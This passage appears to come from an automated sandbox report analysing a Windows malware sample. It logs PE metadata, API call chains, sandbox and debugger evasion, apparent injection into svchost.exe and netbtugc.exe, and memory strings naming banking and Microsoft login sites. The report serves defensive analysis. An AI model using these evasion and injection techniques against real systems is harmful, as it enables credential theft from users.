            Source: QLLafoDdqv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: QLLafoDdqv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: QLLafoDdqv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: QLLafoDdqv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: QLLafoDdqv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WOaBXdWwIJKzuV.exe, 00000003.00000002.4564777627.0000000000D5E000.00000002.00000001.01000000.00000004.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4568620596.0000000000D5E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: QLLafoDdqv.exe, 00000000.00000003.2121082522.0000000004120000.00000004.00001000.00020000.00000000.sdmp, QLLafoDdqv.exe, 00000000.00000003.2125915509.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178687153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2180433869.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2270123023.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2272280186.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: QLLafoDdqv.exe, 00000000.00000003.2121082522.0000000004120000.00000004.00001000.00020000.00000000.sdmp, QLLafoDdqv.exe, 00000000.00000003.2125915509.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2270155402.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178687153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2180433869.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2270123023.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2272280186.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2269979918.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2238927543.000000000281A000.00000004.00000020.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4570954462.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.000000000372C000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2556821079.0000000006F3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.000000000372C000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2556821079.0000000006F3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2269979918.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2238927543.000000000281A000.00000004.00000020.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4570954462.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: QLLafoDdqv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: QLLafoDdqv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: QLLafoDdqv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: QLLafoDdqv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: QLLafoDdqv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006D42DE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F0A76 push ecx; ret 0_2_006F0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024EE2BA push 00000038h; iretd 2_2_024EE2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D48A9 push esp; ret 2_2_024D48AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D17E5 push ebp; retf 003Fh2_2_024D17E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024D3780 push eax; ret 2_2_024D3782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E47A2 push es; iretd 2_2_024E47AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024EA436 push ebx; iretd 2_2_024EA600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E8C92 pushad ; retf 2_2_024E8C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024EA5D9 push ebx; iretd 2_2_024EA600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx2_2_02F309B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0310225F pushad ; ret 4_2_031027F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031027FA pushad ; ret 4_2_031027F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031309AD push ecx; mov dword ptr [esp], ecx4_2_031309B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0310283D push eax; iretd 4_2_03102858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0310135E push eax; iretd 4_2_03101369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02542238 pushad ; iretd 4_2_02542239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0254AB37 push 00000038h; iretd 4_2_0254AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02546E56 push ebx; iretd 4_2_02546E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02540EAB push ebp; retf 4_2_02540EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02546CB3 push ebx; iretd 4_2_02546E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0254101F push es; iretd 4_2_02541027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02531126 push esp; ret 4_2_02531127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0254D1B0 push es; ret 4_2_0254D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0254550F pushad ; retf 4_2_02545510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0254FEF5 push FFFFFFBAh; ret 4_2_0254FEF7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253FFA0 push esi; iretd 4_2_0253FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA429A push cs; retf 4_2_02DA42F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA4268 push cs; retf 4_2_02DA42F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA03DA push ebx; ret 4_2_02DA042C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAD620 push esi; ret 4_2_02DAD63B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA47F5 push es; ret 4_2_02DA47FA
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006EF98E
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00761C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00761C41
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-95984
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeAPI/Special instruction interceptor: Address: 15C3244
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 4124Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 5848Jump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeAPI coverage: 3.8 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4048Thread sleep count: 4124 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4048Thread sleep time: -8248000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4048Thread sleep count: 5848 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4048Thread sleep time: -11696000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576Thread sleep count: 48 > 30Jump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0073DBBE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0070C2A2 FindFirstFileExW,0_2_0070C2A2
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007468EE FindFirstFileW,FindClose,0_2_007468EE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0074698F
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0073D076
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0073D3A9
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00749642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00749642
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0074979D
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00749B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00749B2B
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00745C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00745C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0254BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0254BAB0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006D42DE
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696487552f
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2558088847.0000025CC6E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4571526286.000000000138F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024E7823 LdrLoadDll,2_2_024E7823
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074EAA2 BlockInput,0_2_0074EAA2
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00702622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00702622
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006D42DE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F4CE8 mov eax, dword ptr fs:[00000030h]0_2_006F4CE8
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_015C3510 mov eax, dword ptr fs:[00000030h]0_2_015C3510
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_015C34B0 mov eax, dword ptr fs:[00000030h]0_2_015C34B0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_015C1E70 mov eax, dword ptr fs:[00000030h]0_2_015C1E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]2_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]2_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]2_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]2_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]2_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
